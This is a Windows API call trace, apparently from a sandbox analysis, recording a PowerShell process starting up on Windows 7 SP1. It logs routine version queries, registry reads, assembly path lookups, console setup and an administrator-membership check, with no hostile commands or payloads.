	[0078.567] CoTaskMemFree (pv=0x286830) 
	[0078.567] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x2cf4184, puLen=0xddec0) returned 1
	[0078.567] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0078.567] CoTaskMemAlloc (cb=0x44) returned 0x2fd580
	[0078.567] lstrcpyW (in: lpString1=0x2fd580, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0078.567] CoTaskMemFree (pv=0x2fd580) 
	[0078.567] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x2cf41e8, puLen=0xddec0) returned 1
	[0078.567] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0078.567] CoTaskMemAlloc (cb=0x58) returned 0x244100
	[0078.568] lstrcpyW (in: lpString1=0x244100, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0078.568] CoTaskMemFree (pv=0x244100) 
	[0078.568] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x2cf4264, puLen=0xddec0) returned 1
	[0078.568] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0078.568] CoTaskMemAlloc (cb=0x20) returned 0x2fa2e0
	[0078.568] lstrcpyW (in: lpString1=0x2fa2e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0078.568] CoTaskMemFree (pv=0x2fa2e0) 
	[0078.568] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x2cf3f0c, puLen=0xddec0) returned 1
	[0078.568] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0078.568] CoTaskMemAlloc (cb=0x66) returned 0x2f8270
	[0078.568] lstrcpyW (in: lpString1=0x2f8270, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0078.568] CoTaskMemFree (pv=0x2f8270) 
	[0078.568] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x0, puLen=0xddec0) returned 0
	[0078.568] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x0, puLen=0xddec0) returned 0
	[0078.568] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xddec8, puLen=0xddec0 | out: lplpBuffer=0xddec8*=0x0, puLen=0xddec0) returned 0
	[0078.568] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdde98, puLen=0xdde90 | out: lplpBuffer=0xdde98*=0x2cf3eb4, puLen=0xdde90) returned 1
	[0078.568] CoTaskMemAlloc (cb=0x204) returned 0x288f70
	[0078.568] VerLanguageNameW (in: wLang=0x0, szLang=0x288f70, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0078.568] CoTaskMemFree (pv=0x288f70) 
	[0078.568] VerQueryValueW (in: pBlock=0x2cf3e18, lpSubBlock="\\", lplpBuffer=0xddee8, puLen=0xddee0 | out: lplpBuffer=0xddee8*=0x2cf3e40, puLen=0xddee0) returned 1
	[0078.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0078.813] CoTaskMemFree (pv=0x27d0e0) 
	[0078.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0078.815] CoTaskMemFree (pv=0x27d0e0) 
	[0078.817] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xdddb8 | out: phkResult=0xdddb8*=0x304) returned 0x0
	[0078.819] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xddd7c, lpData=0x0, lpcbData=0xddd78*=0x0 | out: lpType=0xddd7c*=0x1, lpData=0x0, lpcbData=0xddd78*=0x56) returned 0x0
	[0078.819] CoTaskMemAlloc (cb=0x5a) returned 0x2f8200
	[0078.819] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xddd4c, lpData=0x2f8200, lpcbData=0xddd48*=0x56 | out: lpType=0xddd4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xddd48*=0x56) returned 0x0
	[0078.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0078.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdd8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0078.848] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0078.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0078.848] CoTaskMemFree (pv=0x27d0e0) 
	[0080.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0080.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0080.829] CoTaskMemAlloc (cb=0x104) returned 0x27d1f0
	[0080.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0080.829] CoTaskMemFree (pv=0x27d1f0) 
	[0080.918] CoTaskMemFree (pv=0x27d1f0) 
	[0081.063] CoTaskMemAlloc (cb=0x104) returned 0x27d1f0
	[0081.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0081.063] CoTaskMemFree (pv=0x27d1f0) 
	[0081.065] CoTaskMemAlloc (cb=0x104) returned 0x27d1f0
	[0081.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0081.065] CoTaskMemFree (pv=0x27d1f0) 
	[0081.066] CoTaskMemAlloc (cb=0x104) returned 0x27d1f0
	[0081.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d1f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0081.066] CoTaskMemFree (pv=0x27d1f0) 
	[0081.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0081.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0082.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0082.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0085.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0085.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0088.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0095.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0095.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xdd970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0099.784] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0099.784] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0099.784] CoTaskMemFree (pv=0x27d410) 
	[0099.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xddb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0099.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xddac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0099.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xddac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0100.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xddac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.881] bsearch (_Key=0xdb2f0, _Base=0x642ff4a1d90, _NumOfElements=0xcc, _SizeOfElements=0x18, _PtFuncCompare=0x642ff4a337c) returned 0x642ff4a2498
	[0107.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xddb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xddac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xddac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.905] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0107.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.905] CoTaskMemFree (pv=0x27d410) 
	[0107.908] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0107.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.908] CoTaskMemFree (pv=0x27d410) 
	[0107.908] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0107.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.908] CoTaskMemFree (pv=0x27d410) 
	[0107.911] CoCreateGuid (in: pguid=0xde0d8 | out: pguid=0xde0d8*(Data1=0x3a2eb329, Data2=0xe777, Data3=0x4fcc, Data4=([0]=0x84, [1]=0xbf, [2]=0x91, [3]=0x30, [4]=0xac, [5]=0xd5, [6]=0x90, [7]=0xdf))) returned 0x0
	[0108.615] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0108.615] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.615] CoTaskMemFree (pv=0x27d410) 
	[0108.618] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0108.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.618] CoTaskMemFree (pv=0x27d410) 
	[0108.973] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0108.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.973] CoTaskMemFree (pv=0x27d410) 
	[0108.978] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0108.980] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xddd80 | out: lpConsoleScreenBufferInfo=0xddd80) returned 1
	[0108.984] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0108.984] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xddd80 | out: lpConsoleScreenBufferInfo=0xddd80) returned 1
	[0108.985] GetVersionExW (in: lpVersionInformation=0xddd10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xddd10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0108.987] GetCurrentProcess () returned 0xffffffffffffffff
	[0108.988] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xddda8 | out: TokenHandle=0xddda8*=0x1d0) returned 1
	[0109.003] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xddcc8 | out: TokenInformation=0x0, ReturnLength=0xddcc8) returned 0
	[0109.004] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2538c0
	[0109.004] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x2538c0, TokenInformationLength=0x4, ReturnLength=0xddcc8 | out: TokenInformation=0x2538c0, ReturnLength=0xddcc8) returned 1
	[0109.006] DuplicateTokenEx (in: hExistingToken=0x1d0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xdde28 | out: phNewToken=0xdde28*=0x1c8) returned 1
	[0109.006] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xddcc8 | out: TokenInformation=0x0, ReturnLength=0xddcc8) returned 0
	[0109.006] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2538f0
	[0109.006] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x8, TokenInformation=0x2538f0, TokenInformationLength=0x4, ReturnLength=0xddcc8 | out: TokenInformation=0x2538f0, ReturnLength=0xddcc8) returned 1
	[0109.007] CheckTokenMembership (in: TokenHandle=0x1c8, SidToCheck=0x2dcebc0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xdde38 | out: IsMember=0xdde38) returned 1
	[0109.007] CloseHandle (hObject=0x1c8) returned 1
	[0109.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdd950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
